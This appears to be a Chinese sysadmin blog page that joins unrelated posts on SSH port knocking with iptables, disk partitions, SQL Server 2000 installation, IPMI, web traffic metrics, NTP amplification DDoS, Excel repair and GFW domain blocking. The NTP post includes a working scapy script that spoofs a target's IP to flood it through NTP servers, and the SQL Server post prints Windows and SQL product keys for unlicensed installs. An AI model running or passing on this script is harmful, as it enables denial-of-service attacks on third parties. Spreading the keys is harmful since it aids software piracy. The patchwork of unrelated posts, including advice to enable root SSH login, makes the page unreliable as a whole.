运维部落

linux服务器，我们一般是通过ssh通道远程管理，这就需要我们开启ssh端口，如22。但开启端口有被暴力破解的风险，你会说可以设置复杂的密码或使用证书避免。就算破解不了密码，但openssh也可能会有漏洞，你会说可以更改ssh端口，但还是有可能被扫描出来。还有一种选择，我们可以只允许指定IP访问ssh，通过vpn登录管理服务器，但局限很明显，万一紧急情况vpn登录不上去了怎么办。(有条件的我们可以多设置几个指定ip访问，保险些。也推荐大家用这个方法，对我们做数据中心服务器提供商多设置几个ip允许访问当然没有什么问题，因为资源多。)资源少的可以有其他办法吗？答案是肯定的。

下面给出一种个人觉得比较满意的解决方案，即使用iptables的recent模块，通过密令临时开启ssh端口。当然，密令需要保管好，防止外泄。（其实这种办法个人来讲，并不是非常推荐。因为人长时间不连服务器容易健忘密令。哈）

1、iptables规则设定

1
2
3
4

#指定78字节的icmp数据包(包含IP头部20字节，ICMP头部8字节)通过被加入openssh列表。
iptables -A INPUT -p icmp --icmp-type 8 -m length --length 78 -m recent --set --name sshopen --rsource -j ACCEPT
#检查openssh列表是否存在你的来源IP，如果存在，即从第一次使用密令开始15秒钟内开启ssh端口22,超过15秒端口自动关闭，不再允许新连接，已连接的不会断开。
iptables -A INPUT -p tcp --dport 22 --syn -m recent --rcheck --seconds 15 --name sshopen --rsource -j ACCEPT

2、临时开启ssh端口密令

1
2

linux下:ping -s 50 host
windows下:ping -l 50 host

3、示例一个目前服务器上使用的iptables规则

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 443 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 123 -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 8 -m length --length 50 -m recent --set --name sshopen --rsource -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 --syn -m recent --rcheck --seconds 15 --name sshopen --rsource -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 8 -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 11 -j ACCEPT
-A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 443  -j ACCEPT
-A OUTPUT -p icmp -m icmp --icmp-type 8 -j ACCEPT
-A OUTPUT -p icmp -m icmp --icmp-type 11 -j ACCEPT

首先，确保服务器在安装过程中，选择安装openssh软件。
如没有进行安装，请使用以下命令进行安装：
apt-get install -y openssh-server

安装完成后，使用root登录系统：
编辑vim /etc/ssh/sshd_config文件，将PermitRootLogin的值改为yes

因为为root账户设置了密码，所以还要更改PermitEmptyPasswords为 no。然后：wq保存文件！

然后重启ssh服务，如下：
sudo service ssh restart

活动分区是计算机启动分区，操作系统的启动文件都装在这个分区，windows系统下一般被默认为C盘，而Linux则根据具体设置而定。

启动系统时，活动分区上的操作系统将执行一个称为驱动器映像的过程，它给主分区和逻辑驱动器分配驱动器名。所有的主分区首先被映像，而逻辑驱动器用后续的字母指定。

硬盘活动分区定义

　　在一个硬盘中，活动分区一般只能有一个。

将磁盘分区标为活动或取消活动的方法

系统分区必须是已为启动而标记为活动的主分区，并且必须位于启动系统时计算机访问的磁盘。同一磁盘同时只能有一个活动的系统分区。可以具有多个基本磁盘，每个磁盘各有一个活动分区。但是，只能通过某个指定的磁盘启动计算机。如果需要使用其他操作系统，则必须在重新启动计算机之前，先将其系统分区标记为活动。
　　不能将现有的动态卷标记为活动。不过，可以将包含活动分区的基本磁盘转化为动态磁盘。磁盘转化后，该分区将成为活动的简单卷。如果活动分区不是当前的系统分区或引导分区，则它将成为简单卷并丢失其在分区表中的记录，这样，它也就不再是活动的。
　　活动分区其实说白了就是写有引导数据的主分区，它可以完成与BIOS交接启动任务等一系列动作，以用来引导系统。
　　主分区最好只有一个，不然管理起来会比较麻烦，目前来说，小点的硬盘分10G就可以，大的可以考虑15–20G左右，太大了就没有意义了
将分区标记为活动分区（仅限于 32 位）
　　方法1：使用windows界面：
　　1. 在“运行”里输入”compmgmt.msc”（打开计算机管理）;
　　2. 在控制台树中，单击”计算机管理”-”存储”-”磁盘管理”;
　　3. 在需要标为活动的分区上，点击”右键”，点击”将磁盘分区标为活动的”。
　　方法2：使用命令行：
　　1. 在”运行”里，输入”cmd”;
　　2. 接着输入”diskpart”;
　　3. 接着输入”list disk”;
　　4. 接着输入”select disk 0″比如我们现在要将第1硬盘的第1分区做为活动的;
　　5. 接着输入”list partition”;
　　6. 接着输入”select partition 1″;
　　7. 最后输入”active”。
取消将磁盘分区标为活动的
　　取消的时候只能有命令行，因为windows界面的那个选项卡已经变为浅色的不可以勾选了。
　　1.命令行提示符，运行DISKPART，运行入提示符变成”DISKPART>”;
　　2.使用”LIST DISK”命令确定你的移动硬盘的##号;
　　3.使用”Select DISK 0″将你的移动磁盘设置成当前操作磁盘;
　　4:使用“LIST PARTITION”命令确定你的硬盘分区的##号;
　　5.使用”Select PARTITION 1″将第一个分区设置成当前的操作分区;
　　6.使用”INACTIVE”命令解除当前分区的活动状态。

方法一：
在给出的输入CD-KEY(序列号)的界面中，输入你已经安装的windows server 2003 的CD-KEY(序列号)即可以继续安装，而不是SQL 2000的CD-KEY(序列号)。
Windows server 2003的CD-KEY(序列号)：JCGMJ-TC669-KCBG7-HB8X2-FXG7M
（附：SQL2000的CD-KEY(序列号)：SN：311-0432642 CD-KEY：H6TWQ-TQQM8-HXJYG-D69F7-R84VM）

方法二：
刚刚在一台win2003的机器上安装一个sql server 2000 的时候弹出一个窗口要我输入序列号…（建议购买版权）
默认不正确时
在点确定的时候提示序列号不正确，在网上找了一些序列号输入进去也都不正确
我的系统是Windows 2003 Server with SP2，以前都是在XP、2000系统下安装的，没有问题，会不会是系统差异导致的？
微软也发布了相关的KB。解决方法如下：
打开注册表的 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager，将SafeDLLSearchMode这个DWORD 的键值改为 0
!!!!!值注意如果SafeDllSearchMode注册表项不存在, 创建SafeDllSearchMode注册表项。 !!!!!
创建好这个DWORD类型的键值 然后生新安装就OK了
第二种方法测试通过，比较简单，第一种方法，不太好用。

服务器使用IPMI安装系统教程，IPMI可以干什么？简单的说，IPMI可以远程给服务器重装系统，控制服务器电源的开机，关键和重启。当我们使用网络方式远程登录（远程桌面或者SSH）失败时，可以通过IPMI进行服务器的维护。专业点的理解就是 IPMI可以通过带外的方式来管理我们的服务器。

智能平台管理接口 (IPMI) 是一种开放标准的硬件管理接口规格，定义了嵌入式管理子系统进行通信的特定方法。IPMI 信息通过基板管理控制器 (BMC)（位于 IPMI 规格的硬件组件上）进行交流。使用低级硬件智能管理而不使用操作系统进行管理，具有两个主要优点： 首先，此配置允许进行带外服务器管理；其次，操作系统不必负担传输系统状态数据的任务。
下面我们使用常见的超微服务器介绍一下IPMI的使用方法：
一.我们在浏览器中输入IPMI的IP地址，然后会来到如下界面

二.我们输入相应的用户名和密码，点击login，会进入IPMI的内部了。IPMI的菜单比较多，如图所示

其实这些菜单根据名字都很好理解，我们下面就根据实际需要一个一个的介绍一下。
三.第一个菜单system是有关系统信息的，点开会看到：

四.这里，点击system information会弹出一下页面：

五.通过这个画面我们就可以看到主机内部的情况了。但是如果您不能看到这个界面，而是如下所示：

说明您的系统中没有装JAVA虚拟机，我们需要装上JAVA程序才能很好的使用IPMI。点击上图的确定，然后我们就来到java官方网站:

我们点击同意下载，然后浏览器会弹出下载对话框来：

点击保存文件，然后把jxpiinstall.exe下载下来之后，双击运行，就开始安装java虚拟机了。

六.安装完java虚拟机后，重启浏览器，就可以发现IPMI可以正常工作了。
下面，我们回到IPMI的这个菜单中.

七.我们点击方块中的按钮，可以看到如下画面

八.上面一个可以看到主机的信息，点击IPMI中的主机桌面的图片就可以进入控制台，如下图。power control via ipmi 是通过控制主机的电源来实现主机的开机，关机和重启。

九.这就是主机的控制台。同样，控制台也有几个菜单。一般情况下，我们通过文字就能较好的理解。下面我们介绍几个常用的菜单。

通过如上菜单的指示，我们可以直接向主机发送一些常用的组合键，最常用的莫过于 ctrl+alt+del了。

十.下图中这个菜单可以给主机添加ISO镜像。

点击virtual storage 后，在弹出的对话框中可以通过如下步骤添加ISO镜像：

注意，最后一定要点击plug in 才能把光盘插入系统哦。如果想把光盘弹出，可直接点击 plug out。
我们可以看到主机中已经有插入的光盘了：

挂载完成之后，我们登陆IPMI，点击导航菜单的Remote Control ，选择Console Redirection，打开launch console，下载jnlp文件运行，然后选择Macro→Ctrl+Alt+Del，重启服务器，启动时按F11，进入启动菜单，如下图：选择IPMI Virtual CDROM启动。

有时候国际网络太卡，使用键盘操作非常困难，我们看看怎样使用软键盘进行操作。

十一.下面让我们回到浏览器中，再来看一下IPMI其他几个有用的菜单：
远程控制菜单

通过点击远程控制的console redirection选项同样可以打开主机的控制台，通过 power cotrol选项同样可以控制主机的开机，关机和重启。
我们看一下怎样重置IPMI的选项。有时候，我们的IPMI也会紊乱，出现一些不正常的选项，需要进行重置。

通过点击 Unit Reset 在这个子页面中点击确定就可以重置IPMI系统，相当于重启一下IPMI这个设备。

通过点击IKVM Reset这个选项，在子页面中点击确定，就可以重置控制台kvm的会话，有时候会话多了或者时间长了，使用这个会很快解决问题的。

今天说说IP，PV，UV这三个互联网产品常用词，具体定义大家可以知之为知之，不知度娘知，我就不粘贴复制了，显得我很没有诚意。

估计现在已经没有同行会问你，你们产品的IP了，因为IP是可以改变的，而且它并不能反映一些具体问题，当然它还是有用的，它可以让你大体了解你产品使用用户的分布，是一线城市多，还是二三线城市多，这样做的目的是可以指导你产品设计的时尚程度和接受程度，进行合理的调整，下面主要说说PV和UV。

1、什么是PV值
　　PV（page view）即页面浏览量或点击量，是衡量一个网站或网页用户访问量。具体的说，PV值就是所有访问者在24小时（0点到24点）内看了某个网站多少个页面或某个网页多少次。PV是指页面刷新的次数，每一次页面刷新，就算做一次PV流量。
　　度量方法就是从浏览器发出一个对网络服务器的请求（Request），网络服务器接到这个请求后，会将该请求对应的一个网页（Page）发送给浏览器，从而产生了一个PV。那么在这里只要是这个请求发送给了浏览器，无论这个页面是否完全打开（下载完成），那么都是应当计为1个PV。
　　2、什么是UV值
　　UV（unique visitor）即独立访客数，指访问某个站点或点击某个网页的不同IP地址的人数。在同一天内，UV只记录第一次进入网站的具有独立IP的访问者，在同一天内再次访问该网站则不计数。UV提供了一定时间内不同观众数量的统计指标，而没有反应出网站的全面活动。通过IP和cookie是判断UV值的两种方式：
　　用Cookie分析UV值
　　当客户端第一次访问某个网站服务器的时候，网站服务器会给这个客户端的电脑发出一个Cookie，通常放在这个客户端电脑的C盘当中。在这个Cookie中会分配一个独一无二的编号，这其中会记录一些访问服务器的信息，如访问时间，访问了哪些页面等等。当你下次再访问这个服务器的时候，服务器就可以直接从你的电脑中找到上一次放进去的Cookie文件，并且对其进行一些更新，但那个独一无二的编号是不会变的。

把抽象的PV和UV比作一个传统的场景，假设一下，淘宝是一个大的购物中心，第一种情况，一个喜欢你的女生陪你去买耳机，你们买完就走，对于UV，独立访问者而言就是2个，而PV呢就是指你俩只看了一个店铺，那么你们产生的浏览量就是2个。

第二种情况，你陪女神去买东西，你们2个人逛了7家店，那么UV还是2，而PV呢，则就是14。

第三种情况，你运气好追到女神了，你俩结婚了，时间长了，你再陪她逛街你就懒了，于是你俩同时进了购物中心，她自己去逛街，而你坐在购物广场的咖啡厅里等她，她逛了14家店，这个时候，而UV还是2，浏览量PV则是两者相加是15。

每一次加载页面就算一次PV，UV是要算你的cookies的，那么问题来了，还是陪你老婆逛街，你坐在咖啡店里，她逛了14家店，中午你俩出购物广场找朋友吃饭，吃完之后，你老婆还想逛街，你们俩从另外一个门进入购物广场，你坐在咖啡店，你老婆逛了14家店，那PV和UV均为多少？答案我会在下一次分享中告诉大家，当然你们也可以在平台给我留言，答对的朋友，也没有什么礼物，哇咔咔。

IP，UV，PV还是有一些区别的，比如IP是指网络虚拟地区的概念，UV更多的是反映独立使用者，UV相对于IP来说可以更加准确的描绘一个事件的浏览者。比如说，一个访客使用IE来访问，之后他又用翻墙软件还是通过IE来浏览，那么IP则是2，因为IP是基于地理位置的，而UV呢，则是1，至于为什么，自己往前翻，谢谢哒。

大家要一直有一个数据分析的思维在，比如：

PV/UV的合理值，一般是在5倍到10倍比较合理，当然不同性质的产品是不一样的，比如像纯论坛或者是图片网站，那么他的PV就会相对高一些，如果是电影网站PV就相对低一些。

根据这个数据可以来判断自己的产品。如果一个产品的PV/UV太高了，很有可能就是故意刷之，或者是用户加载页面次数太多，而如果太低的话，也不好，这说明你的页面可跳转页面太少，或者用户可能因为按钮啊什么原因，跳转的可能性太低。

下面我们来看看大/中/小网站的UV和PV：

Google是世界第一：UV:295,920,000；PV：7,107,998,400
百度是中国第一：UV=80,100，000,PV=703,278,000，基本上淘宝啊，新浪微博啊都是这个梯队的，前20左右。
第二梯队，20—100，比如汽车之家，它的UV就是在528,000万左右，PV大概在9240,000
第三梯队：100—1000，比如果壳网，UV大概是138,000，PV大概是828,000
在接手一个新的产品之前，你可以先建立一个坐标轴，UV,PV来分析这个产品大概的地位，做一些相关的调整，这是非常简单也是非常基础的东西。

3、IP即独立IP数
　　IP可以理解为独立IP的访问用户，指1天内使用不同IP地址的用户访问网站的数量，同一IP无论访问了几个页面，独立IP数均为1。但是假如说两台机器访问而使用的是同一个IP，那么只能算是一个IP的访问。
　　IP和UV之间的数据不会有太大的差异，通常UV量和比IP量高出一点，每个UV相对于每个IP更准确地对应一个实际的浏览者。
　　①UV大于IP
　　这种情况就是在网吧、学校、公司等，公用相同IP的场所中不同的用户，或者多种不同浏览器访问您网站，那么UV数会大于IP数。
　　②UV小于IP
　　在家庭中大多数电脑使用ADSL拨号上网，所以同一个用户在家里不同时间访问您网站时，IP可能会不同，因为它会根据时间变动IP，即动态的IP地址，但是实际访客数唯一，便会出现UV数小于IP数。

最近一段时间 DDoS 攻击事件让基于 NTP 的 DDoS 攻击变得很火热。
1.什么是 NTP
NTP 是网络时间协议（Network Time Protocol）的简称，干嘛用的呢？就是通过网络协议使计算机之前的时间同步化。

2.NTP 反射和放大攻击
那什么是 NTP 反射和放大攻击呢？如果听过 DNS 反射和放大攻击的话应该就会对这个比较容易理解了，协议不同，效果一样。

我们先来说说放射和放大攻击：

无论是基于 DNS 还是基于 NTP，其最终都是基于 UDP 协议的。在 UDP 协议中正常情况下客户端发送请求包到服务端，服务端返回响应包到客户端，但是 UDP 协议是面向无连接的，所以客户端发送请求包的源 IP 很容易进行伪造，当把源 IP 修改为受害者的 IP，最终服务端返回的响应包就会返回到受害者的 IP。这就形成了一次反射攻击。

放大攻击呢就是一次小的请求包最终会收到一个或者多个多于请求包许多倍的响应包，这样就达到了四两拨千斤的效果。

那我们接着来看什么是 NTP 的反射和放大攻击，NTP 包含一个 monlist 功能，也被成为 MON_GETLIST，主要用于监控 NTP 服务器，NTP 服务器响应 monlist 后就会返回与 NTP 服务器进行过时间同步的最后 600 个客户端的 IP，响应包按照每 6 个 IP 进行分割，最多有 100 个响应包。

我们可以通过 ntpdc 命令向一个 NTP 服务器发送 monlist 以及结合抓包来看下实际的效果。

vps12com@test ~$ ntpdc -n -c monlist x.x.x.x | wc -l

602

在上面的命令行中我们可以看到一次含有 monlist 的请求收到 602 行数据，除去头两行是无效数据外，正好是 600 个客户端 IP 列表，并且从上面图中的 wireshark 中我们也看到显示有 101 个 NTP 协议的包，除去一个请求包，正好是 100 个响应包。

从上图中我们可以看到请求包的大小为 234 字节，每个响应包为 482 字节，如果单纯按照这个数据我们可以计算出放大的倍数是：482*100/234 = 206 倍。其实如果通过编写攻击脚本，请求包会更小，这个倍数值会更大，这样算起来是不是蛮屌的。

我们通过 scapy 实现一个简单的攻击脚本，代码如下：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

#!/usr/bin/env python
# author: vps12.com
 
import sys
from scapy.all import *
 
def attack(target, ntp_server):
    send(IP(dst=ntp_server, src=target)/(UDP(sport=52816)/NTP(version=2, mode=7, stratum=0, poll=3, precision=42)))
 
if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(1)
 
    target = sys.argv[1]
    ntp_server_file = sys.argv[2]
    for ntp_server in open(ntp_server_file, "r"):
        ntp_server = ntp_server.strip()
        if ntp_server != "":
            attack(target, ntp_server)

如何防御
我们可以分为两种情况进行防御
一、加固 NTP 服务
1. 把 NTP 服务器升级到 4.2.7p26及以上。
2. 关闭现在 NTP 服务的 monlist 功能，在ntp.conf配置文件中增加`disable monitor`选项
3. 在网络出口封禁 UDP 123 端口
二、防御 NTP 反射和放大攻击
1. 由于这种攻击的特征比较明显，所以可以通过网络层或者借助运营商实施 ACL 来防御
2. 使用防 DDoS 设备进行清洗

首先将如下脚本放置在/usr/bin下，
要使用cp指令時，以大写CP指令，代替小写cp. (当然你可以自己修改脚本定制适合自己的命令)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

#!/bin/bash
 
PARAM_LIST=$*
PARAM_NUM=$#
TOTAL_SIZE=0
for((i = 0; i < PARAM_NUM - 1; i++))
do
        [ ! -r $1 ] && echo "Cannot read $1." && exit 1
        SIZE=`du -s $1 | awk '{print $1}'`
        ((TOTAL_SIZE = TOTAL_SIZE + SIZE))
        shift
done
TARGET=$1
START_TIME=`date +%s.%N`
cp -a $PARAM_LIST &
echo -ne "Total size: $TOTAL_SIZE KB - %"
while true
do
        LEN_PERCENT=${#PERCENT}
        for((i = 0; i <= LEN_PERCENT; i++))
        do
                echo -ne "\b"
        done
        COPIED=`du -s $TARGET | awk '{print $1}'`
        ((PERCENT = COPIED * 100 / TOTAL_SIZE))
        echo -ne "$PERCENT%"
        ((PERCENT == 100)) && END_TIME=`date +%s.%N` && break
done
MB_SECOND=`echo $TOTAL_SIZE/1024/\($END_TIME-$START_TIME\)|bc`
echo " - SPEED: $MB_SECOND MB/s"

今天同事有一次出现了这种情况：Excel在”XXX.xls”中发现不可读取的内容,是否恢复此工作簿的内容?如果信任此工作簿的来源,请单击”是 “，这种情况呢，单击“是”能打开，但是数据没有了！你说悲摧不！最简单的解决方法是什么呢？

本文只是为了给大家一个更简单的解决方法，不能保证百分之百有用，但是能保证比其他方法简单！遇到此类问题，可以先用此方法试一下（记得要备份哦）。那就请出国产神器——WPS！金山wps已经今非昔比，虽然跟office软件仍然有一定的兼容性问题（要是完全兼容了，微软还不告金山侵权啊！），但是遇到这种情况，wps可就能大显神通啦！

Excel发现不可读取内容最简单解决方法：

第一步：打开wps 表格（如果没装，就安装个，反正是免费的）。

第二步：用wps表格打开有问题的excel文件，没有提示错误，打开正常（不知道跟人品有没有关系，反正这次我试确实是这样！）。

第三步：点击另存为，选择Excel 2007/2010 *.xlsx，保存。

第四步：再用office软件打开试试！完美解决！（说是完美，其实不能保证百分之百恢复没有任何问题）。

其他方法（转载，你看有多复杂）：

1、先把出错文件的文件扩展名（.xlsx)改成压缩文件（.zip)。

2、 双击zip文件（不是解压缩，只是双击文件来打开。）找到xl文件夹下的sharedStrings.xml文件并双击打开文件（一般用IE浏览器打开）。在IE浏览器上会显示错误。 目前遇到过的错误有两种，一种是“结束标记’si’与开始标记’t'不匹配”，一种是“结束标记’sst’与开始标记’si’不匹配”，不论是那种情况，都说明一个问题，也就是源代码中的开闭标签（所谓开闭标签，简单的说就是有一个，就一定在后面有一个）配对配错了，可能是顺序错误，也可能是直接少了一个。

3、在IE页面上右击查看源代码，一般是直接默认记事本txt打开，在记事本中检查修改源代码是非常恶心的事情，因为所有代码都挤在一堆，很难找究竟错在哪里。 如果自己有如Emeditor之类的软件还好，可以直接看到原始代码的行数，那就可以根据报错时候的提示来找错，没有这类软件的，有一个相对好一点点的方法，就是把txt中的内容复制到word文档中，然后利用word里的“查找/替换”功能来检查。

例如我所遇到的“结束标记’sst’与开始标记’si’不匹配”情况，在word中使用“查找/替换”，将所有替换成^P^P（也就是换行换行），发现总共替换2512处，然后将所有替换成^P^P（也就是换行换行），总共替换2508处，那么很明显，少了4个，那只要找出是哪4个地方缺少了，添加上去就可以了。而上述步骤之所以用前后换行来替换原来内容，也是方便将成对的隔离出来，方便查阅。

4、在word中找出错误的地方后，要在记事本里相应的地方修改，然后将记事本保存为新的sharedStrings.xml，如无法直接保存在zip包里面，可以保存在外面再剪贴覆盖到zip里面。

5、重新打开sharedStrings.xml后，发现IE显示上已经没有报错了。

6、再将zip改回xlsx

7、打开修改好的xlsx文件，如果数据一切正常，那就万事大吉，没问题了。

但是，我rp的遇到过经过上述修改后打开xlsx继续报错“发现不可读取的内容”的情况，且也没提示哪里有错。这种时候不要气馁，在电脑上装一个wps吧，用wps的表格程序打开刚刚修改好的那个xlsx，会惊喜的发现，数据都在哪儿呢，赶紧另存吧，另存后的xls文件再用excel 07打开就完全没问题啦。

备注：在最初的时候就直接用wps表格打开受损的xlsx文件也可以，但是有时候可能会发现其中有些数据丢失，所以最好首先进行源代码修复。

不少人可能会纳闷，出现这种问题的原因究竟何在？

可能在编辑时从别的文档拷贝数据，造成外部文档链接，尽管绝大多数情况下不会出问题，但在运气非常背的时候可能就会出现这种错误！

原因1、超链接形成的外部文档链接

解决方案：删除超链接

原因2、从其他文档复制数据、引用其他文档数据，形成公式中的外部数据引用。

解决方案： 删除外部数据引用

原因3、图形、按钮等指定的宏指向了外部文档中的宏

解决方案：在一个隐藏单元格内有个非常不起眼的图形，其指定了一个外部文档中的宏，删除后一切OK.(可以用本人EXCEL必备工具箱一次性删除当前文档中的所有图形对象）。

好啦，祝大家好运！

最近有一些朋友说自己的网站因为没有备案，或是使用海外的一些免费主机或又有一些信息的原因给墙了。无法在国内正常打开。按以下办法可以试试看。

一、域名被墙：如果域名ping的通却打不开网站（排除服务器宕机），用代理或者使用VPN可以打开一般说明域名被封了。
假如域名下的网站非法信息多，敏感，又不整改，会直接被G.F.W墙掉，就是通常所说的被封锁、被屏蔽、被和谐，结果就是访问域名是打不开的，但是解析是正常的。此时域名在国内是无法使用的，国外可以访问和使用。
解决方案：
1、将域名解析到国内的某个大站（如baidu等），过几天后有可能会被解封，看你的人品了；
2、换回国内的空间；
3、换域名（将被墙域名解析到国内空间，然后做301重定向到新域名，以减少流量和权重的丢失）。

二、域名被间歇性屏蔽：如果间歇性的可以打开，打不开的时候用国外代理可以打开，说明域名被间歇性的屏蔽（当然这个情况也可能是国内DNS解析不稳定造成的）。
假如域名下的网站出现非法信息，会暂时打不开，过会又可以打开，一般就判断为间歇性屏蔽，处理方法就是删除敏感信息词条关键字即可。

三、IP被封：如果ping不通，使用国外代理可以打开一般可以确定是ip被封。
注意：一般来说，如果你的域名解析的地址是国外的就会被墙，如果绑定国内的IP一般是不会被墙的。
1.发现有域名被墙的话，最好立即解析走这个域名，不要保留在你的服务器上。
2.域名被墙多数是因为网站上存在过多非法关键词，导致中国国际出口上的“长城防火墙”拦截了这个域名的信息。因此就算你换多次域名，也都有被墙的危险，根治的办法就是在你的服务器上安装关键词拦截系统，把敏感的词汇都给拦截了，这样就能有效保护你的站点不会再次被墙。不安装关键词拦截系统的话，要整改网站内容，检查相关关键字会不会有违反规定的，自己检查不到的，最好的办法是重做网站，以保证之后的域名不被墙掉。
3.如何判断一个域名是否被墙：在国内无法访问，在国外可以访问。测试的可以用在线网页代理访问就知道。
4.被墙域名的连带影响：每个访客访问一次被墙域名之后，在5-20分钟内再去访问同一个IP上的其他站点均无法再次访问。被墙的域名一直解析到某个IP的话，最终会导致整个IP被墙。